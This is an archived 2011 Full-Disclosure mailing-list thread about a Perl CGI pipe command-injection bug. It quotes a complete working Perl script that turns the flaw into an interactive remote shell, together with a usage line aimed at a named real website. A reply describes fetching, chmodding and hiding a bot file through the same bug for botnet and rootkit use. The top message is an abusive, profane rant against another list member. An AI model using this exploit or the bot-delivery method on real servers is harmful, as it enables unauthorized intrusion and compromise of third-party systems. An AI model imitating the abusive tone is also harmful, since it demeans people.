Re: perl pipe exploit (drops you at a shell)

[xD 0x41 <secn3t () gmail com>]

 if you want to stay a member of the list

cmon fatty what ya gonna do now ??? cmon, have me removed.. what have i
done, annoyed one sissy piece of shit liar, who needs to send thru blocked
emails, and still ou speak NOTHING but crap! not one fucking working poC i
have seen from you or rather, any sensible or, real talk, your full of shit,
acting like some CIA UK agent, i am here in AUSTRALIA buddy, come on, My6
isp should be, right in front of you, go ahead and, take a wild guess even!@
then have them come and arrest me, comon fatty, i have already asked you
this once, again, i repeat, WTF are you going to do, and WHO do you think
you are, acting luike a fucking cop, and then making toooo obvious lies...
you are hurting your image, even worse than i think anything i could *ever*
say. Just lying, is enough alone.
Atleast, i am speaking usually from actual REAL WORk ther than this Ind
(seemingly never busy) sec cdonsultant... your a PIECE OF SCUM/DIRT, they
should have banmned EVERYTHING you use, and more!
Your lucky ppl have cc'd you to shit buddy.. you really are... or, you would
simly have nothing valid, no useful input, ever, and, sofar, you keep on
prroving everrything you call me, is right about YOU.
Idiot wanna be fed..come get me fatso.
xd


On 16 October 2011 13:12, andrew.wallace <andrew.wallace () rocketmail com>wrote:

> Your intentional grammar errors are cringe-worthy and hard to read... if
> you want to stay a member of the list, start behaving normally.
>
> Andrew
>
> ------------------------------
> *From:* xD 0x41 <secn3t () gmail com>
> *To:* Marshall Whittaker <marshallwhittaker () gmail com>
> *Cc:* full-disclosure () lists grok org uk
> *Sent:* Sunday, October 16, 2011 1:44 AM
> *Subject:* Re: [Full-disclosure] perl pipe exploit (drops you at a shell)
>
> Thanks for the POST!
> hats VERY cool, althugh it was done before, and i did not match codes to
> see any differences/changes/updates, because I am aware that many systems
> are being fixed against this bug as I know, or rather, perl stdinout is
> maybe being patched in some versions, although it does seem to work stable
> on Debian lenny and thats ok, that would mean most likely Ubuntu is also
> vulnerable... Personally, i have code wich is about half the size of bth the
> ones i have seen, but they do a download to box, so, it is a personal
> wget.pl wich gets , makes dir if none exists, cds to dir, and the cmd is
> simply like this
> ./file.pl pipeget www.blah.com/mybot.txt /var/.inaddr/arpa.ps
> This would then save file, and chmod it automatically as chmod filename +x
> , wich is just a command i thought was critical when this type of stuff is
> used... So, I might try and personalise this, and see if it works better, I
> know the first method i was using to get, was nothing like the one i have
> now wich is pipe() also but, it just totally makes the need for using wget
> not needed, and then also the file and whole session of ./file.pl, gets
> saved to bash_history as a . on its own line, wich is including if you
> upload/get files from one box and up to the local one your sitting on.
>
> Your version, looks the most adaptive one, and would be great to have
> enabled on any connectback shell, maybe chmod cmd could be automatic when it
> puts a file upload/download, however you access it, I know main way a user
> on a control net, would simply privmsg it, and use that pipe exploiting to
> upload everything, chmod, and hide eveything, wich is probably the BEST
> addon i could thinkof for any rootkit, and even just upload command, if you
> target index.php, and look for pg=/page=, maybe a simple my
> @array("'?page=', '?pagina=', '?pg=', '?Page=', '?url=', "); for it to
> target things, and make it show simple CMDS> output on connect-back, then
> print a quick sysinfo and, makesure to show things right on the connectback,
> then have this, and direct a while($perl_pipe_uploader2) {} ,maybe adding in
> if/else using the first perlpipeupload.pl as the first method.. this could
> be great!
> i will look for my code wich is more like a wget but, it uses the exact
> same bugs to , actually works better than the standard get/wget or fetch, as
> it is no switches needed, just the corect args, and it does the rest in
> execl() mode, thru this, i have i think in old days probably used this bug
> somuch, it became a feautre for awhile :P
> I think the scripting is great, the code is good, clear and concise,. and
> very easy to simply use as an addon case 'perlpipeupload2': or, however you
> may add it.. it is awesome code. I ight have to snippet this posting and,
> show both, or, al  3 on my website (crazycoders.com) ,and if you have a
> Posting already up wich will stay there, id be happy to point to it, and
> also paste it, so, thanks!
> i will try and find the code for the wget/put/uploader, when your in PM
> with a bot and you do !cmd mywget a.at/bot /b/o/t , only switches is -s|-n
> for silent or notice user exact infos, prettymuch a wget-summary.
> I like the code and appreciate your posting. It is a nice bug and even
> nicer method to exploit it.
> regards,
> xd-- // #haxnet@EFnet // Independant Arsehole
>
>
> PS: shizzle my nizzle matey!  shizzle it good!
>
>
>
>
> On 16 October 2011 09:01, Marshall Whittaker <marshallwhittaker () gmail com>wrote:
>
> Well shit.  It did send twice. :(  Now I look like a goof, haha.
>
> On Sat, Oct 15, 2011 at 6:58 PM, Marshall Whittaker <
> marshallwhittaker () gmail com> wrote:
>
> This works off the perl pipe read bug, you can just input the first and
> second parts of the web address (with http:// included) and it'll drop you
> at a shell.  When using cd you must use the absolute path because I was too
> lazy to do it the correct way. ;-).  I know this is pretty easy stuff, it
> works off those vulns that can just be exploited with a web browser, but
> this gives you a shell.  So have at it guys & gals!  Had to resend because I
> got some message about my attachment being blocked.  Not sure if it really
> was, though, I'll send again anyway.  Hope this isn't spamming the list. =/
>
> Site:
> http://ultimategto.com/cgi-bin/statsedittext.cgi?filename=stats/1966vinmatrix.htm&desc=Stat+File
> Useage: ./sublime.pl "
> http://ultimategto.com/cgi-bin/statsedittext.cgi?filename=";
> "&desc=Stat+File"
>
> Should work on most perl cgi scripts that are vulnerable to | read bug.
>  Please note, it's not a "real" shell, but almost everything works, except
> things that won't go in one instance like cd-ing and env vars, etc.
>
> Play nice!
>
> --oxagast
>
> [CODE]
>
> #!/usr/bin/perl
>
> # adaptive cgi shell by oxagast
>
> use LWP::Simple;
> $part1 = @ARGV[0]; $part2 = @ARGV[1];
> print "Making buffer...\n";
> for $bet (100..200) {
> $bettwo = $bettwo . "AAAA" . $bet . "AAAA\\\\n";
> }
> print "Exploiting...\n";
> $id = get("$part1\|id\|$part2");
> $id =~ m/(uid=\d+\(.*\) gid=\d+\(.*\) groups=\d+\(.*\))/;
> print "Well shizzle my nizzle... shell by oxagast... use wisely \;\)\n\n";
> $uid = $1;
> print "$uid\n";
> while (0 == 0) {
> print "\$ ";
> $cmd = <STDIN>;
>  chomp($cmd);
> if ($cmd =~ m/cd (\/.*)/) {
> $dir = $1;
>  }
> if ($cmd eq "cd ..") {
> $dir =~ s/(.*)\/.*/\/\1/;
>  }
> if ($cmd eq "pwd") {
> $dirjunk = $dir;
>  if ($dirjunk eq "//") {
> $dirjunk = "/";
> }
>  }
> $dirjunk = "cd $dir\;$cmd";
>  $cmdhex = unpack("H*","$dirjunk &>/tmp/cmdlnerr");
> $cmdhex =~ s/(..)/\\\\x$1/g;
>  get("$part1\|echo -e $bettwo > /tmp/buff\|$part2");
> $backjunk2 = get("$part1\|cat /tmp/buff\|$part2");
>  @backjunk = split("\n", $backjunk2);
> get("$part1\|echo -e \"$cmdhex\" > /tmp/cmdln\|$part2");
>  get("$part1\|/bin/sh /tmp/cmdln > /tmp/cmdlerr\|$part2");
> $backjunk_as = get("$part1\|cat /tmp/cmdlnerr\|$part2");
>  @backjunk_split = split("\n", $backjunk_as);
> $backjunk_wcl = get("$part1\|wc -l /tmp/cmdlnerr\|$part2");
>  $backjunk_wcl =~ m/(\d+) \/tmp\/cmdlnerr/m;
> $thismanylines = $1 - 1;
> for $junknum (0..scalar(@backjunk_split)) {
>  for $fuzz (10..100+$thismanylines) {
> if ($backjunk[$junknum] =~ m/(AAAA\Q$fuzz\EAAAA)/) {
>  $middle = $1;
> @backjunk[$junknum] =~ m/(.*)\Q$middle\E/;
> @backjunk_split[$junknum] =~ s/$1//;
>  @backjunk[$junknum] =~ m/\Q$middle\E(.*)/;
> @backjunk_split[$junknum] =~ s/$1//;
>  print "$backjunk_split[$junknum]\n";
> }
> }
>  }
> }
>
> [/CODE]
>
>
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
>
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/